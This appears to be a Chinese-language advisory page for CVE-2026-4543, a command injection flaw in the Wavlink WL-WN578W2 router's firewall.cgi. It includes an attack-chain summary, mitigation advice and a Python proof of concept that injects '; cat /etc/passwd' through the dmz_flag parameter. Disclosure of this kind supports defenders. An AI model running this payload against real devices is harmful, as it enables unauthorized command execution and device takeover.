CVE-2026-4543 CVSS 6.3 中危

CVE-2026-4543 Wavlink路由器命令注入漏洞

披露日期: 2026-03-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4543

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Wavlink WL-WN578W2

漏洞概述

Wavlink WL-WN578W2路由器固件版本221110存在命令注入漏洞。攻击者可通过向/cgi-bin/firewall.cgi接口发送特制的POST请求，操控dmz_flag或del_flag参数，在设备上远程执行任意系统命令，导致设备被完全控制。

技术细节

该漏洞位于Wavlink WL-WN578W2设备的/cgi-bin/firewall.cgi组件中。由于程序在处理POST请求参数（特别是dmz_flag和del_flag）时，缺乏严格的输入验证，直接将用户可控的数据传递给系统Shell执行。攻击者可以利用Shell元字符（如;、|、&）构造恶意Payload，拼接并执行任意操作系统命令。尽管攻击需要低权限（PR:L），但利用网络向量（AV:N）发起攻击且无需用户交互（UI:N）。成功利用该漏洞可导致机密性、完整性及可用性受损。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别出暴露的Wavlink WL-WN578W2设备，并确认其Web管理接口可达。

STEP 2

2. 发送恶意请求

攻击者向/cgi-bin/firewall.cgi端点发送HTTP POST请求，在dmz_flag或del_flag参数中注入恶意Shell命令。

STEP 3

3. 命令执行

后端CGI脚本解析请求参数，未经过滤直接传递给系统Shell，导致注入的恶意命令在服务器端执行。

STEP 4

4. 获取控制权

根据注入的命令不同，攻击者可读取敏感文件、反弹Shell或修改系统配置，从而控制设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip):
    url = f"http://{target_ip}/cgi-bin/firewall.cgi"
    # Payload to execute a simple command (e.g., reboot or cat passwd)
    # Using semicolon to chain commands
    payload = "; cat /etc/passwd"
    
    data = {
        "dmz_flag": payload, # Vulnerable parameter
        # "del_flag": payload  # Alternative vulnerable parameter mentioned
    }
    
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }
    
    try:
        print(f"[+] Sending payload to {target_ip}...")
        response = requests.post(url, data=data, headers=headers, timeout=5)
        print(f"[+] Status Code: {response.status_code}")
        print("[+] Response:")
        print(response.text)
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "192.168.1.1" # Replace with actual target IP
    exploit(target)

影响范围

Wavlink WL-WN578W2 221110

防御指南

临时缓解措施

在厂商发布补丁前，建议通过ACL（访问控制列表）禁止外部网络访问设备的管理端口（如80/443），确保仅信任的内网IP可以访问管理界面。同时，密切监控设备日志中是否存在异常的CGI请求或系统命令执行记录。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4543
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4543
3 Details https://www.cvedetails.com/cve/CVE-2026-4543/
4 VulDB https://vuldb.com/cve/CVE-2026-4543
5 Link https://github.com/Litengzheng/vul_db/blob/main/WL-WN578W2/vul_4/README.md
6 Link https://github.com/Litengzheng/vul_db/blob/main/WL-WN578W2/vul_5/README.md
7 Link https://vuldb.com/?ctiid.352360
8 Link https://vuldb.com/?id.352360
9 Link https://vuldb.com/?submit.774690
10 Link https://vuldb.com/?submit.774691

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表